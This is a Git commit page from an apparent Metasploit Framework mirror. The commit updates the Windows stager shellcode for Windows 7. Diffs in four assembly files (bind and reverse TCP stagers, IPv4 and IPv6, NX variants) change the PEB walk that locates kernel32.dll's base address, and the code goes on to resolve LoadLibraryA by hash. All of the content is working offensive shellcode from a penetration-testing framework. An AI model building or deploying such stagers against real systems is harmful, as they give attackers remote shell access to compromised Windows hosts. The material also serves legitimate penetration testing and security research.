adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adds Windows 7 support for the primary stagers: http://www.harmonysecurity.com/blog/2009/06/retrieving-kernel32s-base-address.html

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@6677 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore
2009-06-20 04:35:44 +00:00
parent 5a4ad7c1c9
commit 1fba3f678b
8 changed files with 77 additions and 72 deletions
Download Patch File Download Diff File Expand all files Collapse all files
external/source/shellcode/windows/stager_bind_ipv6_tcp_nx.asm
Vendored
+3 -2
View File
@@ -67,9 +67,10 @@ LKernel32Base:
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx + 0x14]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
mov ebx, [ebx]
mov ebx, [ebx + 0x10]
push ebx ; kernel32.dll base
push dword 0xec0e4e8e ; LoadLibraryA
external/source/shellcode/windows/stager_bind_tcp_nx.asm
Vendored
+3 -2
View File
@@ -67,9 +67,10 @@ LKernel32Base:
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx + 0x14]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
mov ebx, [ebx]
mov ebx, [ebx + 0x10]
push ebx ; kernel32.dll base
push 0xec0e4e8e ; LoadLibraryA
external/source/shellcode/windows/stager_reverse_ipv6_tcp_nx.asm
Vendored
+3 -2
View File
@@ -67,9 +67,10 @@ LKernel32Base:
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx + 0x14]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
mov ebx, [ebx]
mov ebx, [ebx + 0x10]
push ebx ; kernel32.dll base
push dword 0xec0e4e8e ; LoadLibraryA
external/source/shellcode/windows/stager_reverse_tcp_nx.asm
Vendored
+3 -2
View File
@@ -67,9 +67,10 @@ LKernel32Base:
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx + 0x14]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
mov ebx, [ebx]
mov ebx, [ebx + 0x10]
push ebx ; kernel32.dll base
push 0xec0e4e8e ; LoadLibraryA